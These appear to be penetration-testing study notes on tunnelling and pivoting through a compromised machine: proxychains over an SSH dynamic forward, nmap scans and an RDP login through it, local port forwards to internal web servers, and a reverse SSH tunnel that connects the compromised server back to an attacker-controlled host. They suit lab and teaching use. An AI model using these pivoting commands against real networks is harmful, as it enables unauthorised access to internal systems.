Tunneling

Proxychains

Comment the proxy_dns line in the /etc/proxychains4.conf file

Create a Forward Proxy by connecting to machine via SSH and port forward default Proxychains port

ssh -f -N -D 9050 root@10.10.100.2 

-f backgrounds ssh
-N doesnt execute remote commands
-D bind with port 9050

Use Proxychains with commands

 proxychains nmap -sC -sV -T4 10.10.200.0/24

proxychains xfreerdp /u:administrator /p:'Password1' /v:10.10.200.225

SSH Tunneling

There are two ways to create a SSH tunnel using the SSH client which are port forwarding, and creating a forward proxy

SSH Port Forwarding

Create a link to an internal webserver (172.16.0.10:80) using port 8000 and SSH access to the compromised machine (172.16.0.5).

ssh -L 8000:172.16.0.10:80 user@172.16.0.5 -fN

• -L creates a link to the Local Port

• -f backgrounds the shell

• -N no commands to be executed

You have SSH access to a server (172.16.0.50) with a webserver running internally on port 80 (i.e. only accessible to the server itself on 127.0.0.1:80). Forward it to port 8000 on your machine

ssh -L 8000:127.0.0.1:80 user@172.16.0.50 -fN

Reverse SSH Connection (ABSOLUTE NO NO)

Anyways..

Very risky but ideal if you have a shell on the compromised server but no SSH access.

Generate a new key pair

ssh-keygen

Copy the contents of the public key (the file ending with .pub), then edit the ~/.ssh/authorized_keys file on your ownmachine. You may need to create the ~/.ssh directory and authorized_keys file first.

Paste this line on a new line in the public key

command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty

Start the SSH server

sudo systemctl start ssh

Transfer the private key and connect back to your machine

ssh -R $LOCAL_PORT:$TARGET_IP:$TARGET_PORT $USERNAME@$ATTACKING_IP -i KEYFILE -fN

Should mainly be used for any internal webapps